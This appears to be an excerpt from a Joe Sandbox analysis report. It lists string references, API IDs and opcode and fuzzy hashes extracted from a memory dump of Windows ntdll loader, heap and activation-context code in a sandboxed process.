                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  • Opcode ID: d479b1527a382054bdad1f9cdddbfd4e622f940aa2b32d22c592144f3dea4089
                                                                  • Instruction ID: 3d8c8e45742accccc0415bd949857145aa3c388e38b4b663fee3ec047a25da96
                                                                  • Opcode Fuzzy Hash: d479b1527a382054bdad1f9cdddbfd4e622f940aa2b32d22c592144f3dea4089
                                                                  • Instruction Fuzzy Hash: 78910770B403159BEB15CF64CB94BAA77B4BF54B58F000129EA156BFC9D7789802CB91
                                                                  Strings
                                                                  • Getting the shim user exports failed with status 0x%08lx, xrefs: 22AC9A01
                                                                  • LdrpInitShimEngine, xrefs: 22AC99F4, 22AC9A07, 22AC9A30
                                                                  • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 22AC99ED
                                                                  • Loading the shim user DLL failed with status 0x%08lx, xrefs: 22AC9A2A
                                                                  • apphelp.dll, xrefs: 22A66496
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 22AC9A11, 22AC9A3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-204845295
                                                                  • Opcode ID: 05844546c50e0e043dee76410a44cde2828841be8605334043e0a1d6b33a12c2
                                                                  • Instruction ID: 8d1ad159583b3fce5eeee18979177f0e7dd13ee640d0aa755bed813ca5c9c9f2
                                                                  • Opcode Fuzzy Hash: 05844546c50e0e043dee76410a44cde2828841be8605334043e0a1d6b33a12c2
                                                                  • Instruction Fuzzy Hash: D951BEB16483019FE724CF24CA81F7B77E4BF84B84F000A19FA959B991DB34D905CB92
                                                                  Strings
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 22AE81E5
                                                                  • LdrpInitializeProcess, xrefs: 22AAC6C4
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 22AE8170
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 22AAC6C3
                                                                  • LdrpInitializeImportRedirection, xrefs: 22AE8177, 22AE81EB
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 22AE8181, 22AE81F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: a009ab3b916a30b45dd253b8a98939d5f766d9148302c26de2904779c757e639
                                                                  • Instruction ID: 284dd56bd51518a6aa158504ac0ca794737e14eb084c9f9a6ae5acaa1cd1768c
                                                                  • Opcode Fuzzy Hash: a009ab3b916a30b45dd253b8a98939d5f766d9148302c26de2904779c757e639
                                                                  • Instruction Fuzzy Hash: 903105B17847419FE210DF28CE81E2BB7E5FFD4B54F000968F9456BA91E620DC05C7A2
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context, xrefs: 22AE2165
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 22AE21BF
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 22AE2160, 22AE219A, 22AE21BA
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 22AE219F
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22AE2180
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22AE2178
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: 9cd3f46dcc97cbd77067137083a959e9ec52c0e87a3a5018173ff3ebab35338b
                                                                  • Instruction ID: 28ab5660a3bc89a01d972011a655940a900fb4e10fefe23963f0a3911fb95227
                                                                  • Opcode Fuzzy Hash: 9cd3f46dcc97cbd77067137083a959e9ec52c0e87a3a5018173ff3ebab35338b
                                                                  • Instruction Fuzzy Hash: 37310232F00314BBE7218A958DD0F9B7778EFA5B84F110069FB09B7A44D6B09B11C7A1
                                                                  APIs
                                                                    • Part of subcall function 22AB2DF0: LdrInitializeThunk.NTDLL ref: 22AB2DFA
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0BA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0BB6
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0D60
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0D74
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 1404860816-0
                                                                  • Opcode ID: 50641d109f6621b8b642da67107df56b07403d9965f540b32bed129b221cd2c4
                                                                  • Instruction ID: 0de12fd00f70056b576a707c910b40532434511d9e2ab54782f8f2f0d88ed9a9
                                                                  • Opcode Fuzzy Hash: 50641d109f6621b8b642da67107df56b07403d9965f540b32bed129b221cd2c4
                                                                  • Instruction Fuzzy Hash: FE428E75A00705DFDB21CF24C981BAAB7F8FF14304F1445AAE999EB641E770AA85CF60
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 22AFCFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @$@4Cw@4Cw
                                                                  • API String ID: 4062629308-3101775584
                                                                  • Opcode ID: b88026a9ffd8b3e66c2f7ae3acc209fe1e249089e8d14939bf9c1a8d91ff77d5
                                                                  • Instruction ID: bc2525fa501b6800f63e2d215868ad4f837c6231c481bffc8a0826e854f86892
                                                                  • Opcode Fuzzy Hash: b88026a9ffd8b3e66c2f7ae3acc209fe1e249089e8d14939bf9c1a8d91ff77d5
                                                                  • Instruction Fuzzy Hash: 2D419F72A40754DFCB22CFA5CA80A7DBBB8FF54B04F00452AF915DBA55D7398901CB61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  • Opcode ID: 7a743b340f471e1d5c853a9a76c89a618c13d063c8d68ae0218a2f216bcc6153
                                                                  • Instruction ID: 3b9730d261928a15dd1a4d339f96384ce83857c1191502d0983a0f9909881fd3
                                                                  • Opcode Fuzzy Hash: 7a743b340f471e1d5c853a9a76c89a618c13d063c8d68ae0218a2f216bcc6153
                                                                  • Instruction Fuzzy Hash: 92C16B75208382DFC711CF14CA84B5EB7F4BF84708F00496AF9968BA52E779CA45CB5A
                                                                  Strings
                                                                  • LdrpInitializeProcess, xrefs: 22AA8422
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 22AA855E
                                                                  • @, xrefs: 22AA8591
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 22AA8421
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  • Opcode ID: 0c422fcbf54a692a5d87b4919c370ada97e4b98d5f1f4f27dbcbf43734a4c29f
                                                                  • Instruction ID: cf0a034693e50649f7dda55e7ecbe868184862fea22080e39b0b2c5763a5d639
                                                                  • Opcode Fuzzy Hash: 0c422fcbf54a692a5d87b4919c370ada97e4b98d5f1f4f27dbcbf43734a4c29f
                                                                  • Instruction Fuzzy Hash: AD916B71648345AFD711DE21CD90FABBBECBF94784F80092EFA8496951E734D904CBA2
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context, xrefs: 22AE21DE
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 22AE21D9, 22AE22B1
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 22AE22B6
                                                                  • .Local, xrefs: 22AA28D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: 956780f108f8ef37d93ef2b1cd6421744cda8384fb86cc880a4c2c79cb23226d
                                                                  • Instruction ID: 9d1e8d6f520e277a516be466bf8ed3d194034d8f02f11a4dca14c37b98b92c72
                                                                  • Opcode Fuzzy Hash: 956780f108f8ef37d93ef2b1cd6421744cda8384fb86cc880a4c2c79cb23226d
                                                                  • Instruction Fuzzy Hash: FEA1BE31A40329DBDB20CF64CDD4B99B3B1BF58718F2141EAD908ABA51D7B09E91CF90
                                                                  Strings
                                                                  • RtlDeactivateActivationContext, xrefs: 22AE3425, 22AE3432, 22AE3451
                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 22AE3456
                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 22AE3437
                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 22AE342A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                  • API String ID: 0-1245972979
                                                                  • Opcode ID: 900055472be615044c89cb88a19c719b44076b931152d3256dfb67a568e76a01
                                                                  • Instruction ID: 4d8bba08c3c42ee2e081f73e5b05e934d7759e67196dab1d7b329b8934a79008
                                                                  • Opcode Fuzzy Hash: 900055472be615044c89cb88a19c719b44076b931152d3256dfb67a568e76a01
                                                                  • Instruction Fuzzy Hash: 736112326417119BC312CF18CA91F2AB3F5BF80B55F108569FD5A9FA40C734E901CB91
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 22AD10AE
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 22AD1028
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 22AD0FE5
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 22AD106B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  • API String ID: 0-1468400865
                                                                  • Opcode ID: 6de379deee99be1881e54060f6a8672e7b3f33d43e94728a684e785d43ee1b08
                                                                  • Instruction ID: 27abf39ec0536e59fc0adaac18e27d025f6ed4fd066436cf485c7cf7825aece4
                                                                  • Opcode Fuzzy Hash: 6de379deee99be1881e54060f6a8672e7b3f33d43e94728a684e785d43ee1b08
                                                                  • Instruction Fuzzy Hash: C871C1B1A443049FC710CF18CAC4F8B7BA8BF55B54F400569FA488BA86D735D588DBD6
                                                                  Strings
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 22ADA992
                                                                  • apphelp.dll, xrefs: 22A92462
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 22ADA9A2
                                                                  • LdrpDynamicShimModule, xrefs: 22ADA998
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  • Opcode ID: 59ba28091c8b80bc14c3eb5a6cd5df43133e5ac4f766bd67e33d75fcf5edf23b
                                                                  • Instruction ID: 846a1838693d0ede79dd1b6fe53245d3cb9d576689bfd595755247ae6f419c4a
                                                                  • Opcode Fuzzy Hash: 59ba28091c8b80bc14c3eb5a6cd5df43133e5ac4f766bd67e33d75fcf5edf23b
                                                                  • Instruction Fuzzy Hash: DD312873A80301ABD7108F69CAC0F7A77B4FF84B44F15451AED156BA96C7BCA981CB80
                                                                  Strings
                                                                  • HEAP: , xrefs: 22A83264
                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 22A8327D
                                                                  • HEAP[%wZ]: , xrefs: 22A83255
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                  • API String ID: 0-617086771
                                                                  • Opcode ID: e842d83b82eacc0a39a1f94c4167174fcd4bc8e1fdb095c6449907daf55e346c
                                                                  • Instruction ID: ba55ba3f108fbe0d561ed5b16ad24b17cf906272175ac081f3fcdd60100c9d40
                                                                  • Opcode Fuzzy Hash: e842d83b82eacc0a39a1f94c4167174fcd4bc8e1fdb095c6449907daf55e346c
                                                                  • Instruction Fuzzy Hash: 3792CD71A043889FDB15CF68C580BAEBBF1FF08304F1481AAE989ABB51D774A945CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: 57693235d340374a5c53f371e358431b752cd7496922a0211a5c1a5d7415e955
                                                                  • Instruction ID: ad4e30aafe495e513118a38a59e6eb6ea14da95dea3da36c1b82f27b4d372b3f
                                                                  • Opcode Fuzzy Hash: 57693235d340374a5c53f371e358431b752cd7496922a0211a5c1a5d7415e955
                                                                  • Instruction Fuzzy Hash: 36F1A831A00705EFEB15CF68C991F6AB7B5FF54304F1082A8E5159BB91D734EA81CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $@
                                                                  • API String ID: 0-1077428164
                                                                  • Opcode ID: 45aee2225e961bbeab84c3de89f41919bb5b47d49c4069dcd928dd62a2206c9e
                                                                  • Instruction ID: 15ea015c3ac172546e6315167fc7d2550f3a460250d5afce9b178cfff9b8604a
                                                                  • Opcode Fuzzy Hash: 45aee2225e961bbeab84c3de89f41919bb5b47d49c4069dcd928dd62a2206c9e
                                                                  • Instruction Fuzzy Hash: 3EC27FB26083819FD725CF29C980BABBBE5BF88744F04892DF989C7641D734D945CB62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  • Opcode ID: 9ee59984538e83ed9bf4152a26c6b4ed879bf20ac1c7f6f77783ed12b9cb5665
                                                                  • Instruction ID: 5bbf8f26dd94d533d26bffff469e8f1fc94d9ee0c3c34aeb1a2a4cc19eace330
                                                                  • Opcode Fuzzy Hash: 9ee59984538e83ed9bf4152a26c6b4ed879bf20ac1c7f6f77783ed12b9cb5665
                                                                  • Instruction Fuzzy Hash: 54A1A9719513299BDB21DF24CD88BEAB7B9FF04704F1041EAEA09A7660E7359E84CF50
                                                                  Strings
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 22ADA10F
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 22ADA121
                                                                  • LdrpCheckModule, xrefs: 22ADA117
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-161242083
                                                                  • Opcode ID: a3210d1312e06315502d1f46f8f1dc2e5920a41a64b97a646baad917c12ec211
                                                                  • Instruction ID: c1c50f7987496b106d7f2dda9461dda3c855dc8cfedd89327c4c36941ef249f0
                                                                  • Opcode Fuzzy Hash: a3210d1312e06315502d1f46f8f1dc2e5920a41a64b97a646baad917c12ec211
                                                                  • Instruction Fuzzy Hash: D071DE71A403059FDB04CF69CA81BAEB7F4FF48744F144429E906EBA96E738AA45CB40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-1334570610
                                                                  • Opcode ID: e58556208bbfb06f8abe3bb68083cf0e6ed022038a40d68df246174a69df80b0
                                                                  • Instruction ID: d2e572c5c64a9dd0ed189feca72bc816ffe3648f6c2b31f109106ca416ed375c
                                                                  • Opcode Fuzzy Hash: e58556208bbfb06f8abe3bb68083cf0e6ed022038a40d68df246174a69df80b0
                                                                  • Instruction Fuzzy Hash: 2F610031600301DFD719CF24C595B6ABBF1FF44308F1486AAE9998FA96D770E881CB92
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 22AE82E8
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 22AE82DE
                                                                  • Failed to reallocate the system dirs string !, xrefs: 22AE82D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1783798831
                                                                  • Opcode ID: 9a020bdb72957dc1d1a9e91eefaacfdf80a628d6083f9f73c8d9da478ec631c1
                                                                  • Instruction ID: c2590ce6fc69768e41764240d88214cf64103d554ef31cd4ab7ad1f9d8eecbba
                                                                  • Opcode Fuzzy Hash: 9a020bdb72957dc1d1a9e91eefaacfdf80a628d6083f9f73c8d9da478ec631c1
                                                                  • Instruction Fuzzy Hash: C841C3B1684300EBD710DB74CE80B6B77E9BF58790F00492AF949D7AA5EB78D900CB91
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 22B2C1C5
                                                                  • PreferredUILanguages, xrefs: 22B2C212
                                                                  • @, xrefs: 22B2C1F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                  • API String ID: 0-2968386058
                                                                  • Opcode ID: b58bf33b2b57251943109ce1dee220d503730c39410fb8bb1c160bbec7a95894
                                                                  • Instruction ID: 389fae42250b55315a66913461a080c757f3c22589a5d67ccbc3a643f9d03653
                                                                  • Opcode Fuzzy Hash: b58bf33b2b57251943109ce1dee220d503730c39410fb8bb1c160bbec7a95894
                                                                  • Instruction Fuzzy Hash: D8417E72E40709ABDB01CED4CD80FEEB7B8EB14B05F11426AEA49A7250DB749A44CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                  • API String ID: 0-1373925480
                                                                  • Opcode ID: f560d8b3512f504b44643e7bae484d87ab77f6234b47a8e1863dbe616ace696a
                                                                  • Instruction ID: ee1030bdd24f1f4a0e131007e184ae1975eec356fa1db69dcd75a9932479ce0e
                                                                  • Opcode Fuzzy Hash: f560d8b3512f504b44643e7bae484d87ab77f6234b47a8e1863dbe616ace696a
                                                                  • Instruction Fuzzy Hash: 38410471A403888BEB12CBA5CA40B9DBFB8EF59344F10055AE940FFBA1DB349E41CB11
                                                                  Strings
                                                                  • LdrpCheckRedirection, xrefs: 22AF488F
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 22AF4888
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 22AF4899
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-3154609507
                                                                  • Opcode ID: 3f324432289df61f918ef9b5854bcd133d23dc71cdf1415688453c0ab556b69e
                                                                  • Instruction ID: 82a0e9e13e2c5846d5c8eccdf100ad7f17b1d624065025f59aaf9900030ad065
                                                                  • Opcode Fuzzy Hash: 3f324432289df61f918ef9b5854bcd133d23dc71cdf1415688453c0ab556b69e
                                                                  • Instruction Fuzzy Hash: FA419032A04790DBCB21CE68CA80E667BF5BF49754F010659FE4897B65D73AE900CBD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-2558761708
                                                                  • Opcode ID: ea5a5e768822426413576ac385ee31c74357da018105de164553ce671d68e94a
                                                                  • Instruction ID: 8dd666331700e2d501be58600c5bedd102190cef11b73708e3ae6387e7ac0d32
                                                                  • Opcode Fuzzy Hash: ea5a5e768822426413576ac385ee31c74357da018105de164553ce671d68e94a
                                                                  • Instruction Fuzzy Hash: A11130733553008FD708CA24C485F6AB3A2FF4072AF14862AE905EBE95EB30E840C782
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 22AF2104
                                                                  • LdrpInitializationFailure, xrefs: 22AF20FA
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 22AF20F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2986994758
                                                                  • Opcode ID: 5f07788964ff853446204e7d41ac2c0da54e5742b3475773645197602a0ba799
                                                                  • Instruction ID: 3dbdfc584929e47488d337750e009200a2bbb6683d4b6ea4ea6c35b583649351
                                                                  • Opcode Fuzzy Hash: 5f07788964ff853446204e7d41ac2c0da54e5742b3475773645197602a0ba799
                                                                  • Instruction Fuzzy Hash: CEF0C871B80308BBE714D648CE92FA6376CFB50B94F100465FB007BA85D6F9A514C695
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
